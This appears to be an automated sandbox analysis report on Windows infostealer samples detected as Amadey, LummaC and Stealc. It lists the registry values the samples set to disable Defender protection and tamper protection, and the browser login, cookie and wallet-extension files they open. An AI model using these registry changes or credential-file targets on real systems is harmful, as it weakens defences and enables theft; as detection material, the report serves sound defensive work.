Source: C:\Users\user\1000350002\6a8d4317d4.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A6CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_00A6CBEA
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A565E0 LookupAccountNameA, 6_2_00A565E0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Registry value created: TamperProtection 0 Jump to behavior
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
AV process strings found (often used to terminate AV products)
Source: ea2c7beae0.exe, 0000000B.00000003.2684413253.0000000000AC6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2684577632.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2684499484.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000002.2919863056.00000000007C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 1.2.skotes.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.h3yRbjNWk1.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.skotes.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1721238447.00000000007C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1760678116.0000000000A51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2316876024.0000000005150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2912971386.0000000004F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2919732407.0000000000A51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1758451395.0000000000A51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1680996838.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1720480608.0000000005210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1718158159.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: 00000015.00000002.2921279103.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 8X6R8OO7U6CNLMSAL.exe PID: 4192, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: ea2c7beae0.exe PID: 1168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ea2c7beae0.exe PID: 6376, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 15.0.num.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.num.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.num.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.0.num.exe.650000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.6a8d4317d4.exe.d20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.6a8d4317d4.exe.d20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.6a8d4317d4.exe.d20000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.2900581975.0000000000651000.00000080.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2537460651.000000000095E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2654891019.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000003.2881192763.0000000005160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.2678859508.0000000000651000.00000080.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2695730886.0000000000D21000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2864835627.0000000000D21000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.2883036920.0000000000651000.00000080.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2731328670.00000000011EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2695281635.000000000094B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2730538903.0000000000651000.00000080.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2904376187.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2496940953.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.2821857520.0000000005490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2538148341.0000000000D21000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2867421028.000000000162B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 5064, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 5168, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 4144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6a8d4317d4.exe PID: 6996, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 2716, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000401001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: ea2c7beae0.exe String found in binary or memory: %appdata%\Electrum-LTC\wallets
Source: ea2c7beae0.exe String found in binary or memory: %appdata%\ElectronCash\wallets
Source: ea2c7beae0.exe String found in binary or memory: Wallets/JAXX New Version
Source: ea2c7beae0.exe, 0000000B.00000003.2670087048.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: ea2c7beae0.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: ea2c7beae0.exe String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: ea2c7beae0.exe, 0000000B.00000003.2603721155.0000000000A97000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Binance
Source: ea2c7beae0.exe, 0000000B.00000003.2670087048.0000000000AAF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
Source: ea2c7beae0.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: ea2c7beae0.exe String found in binary or memory: keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
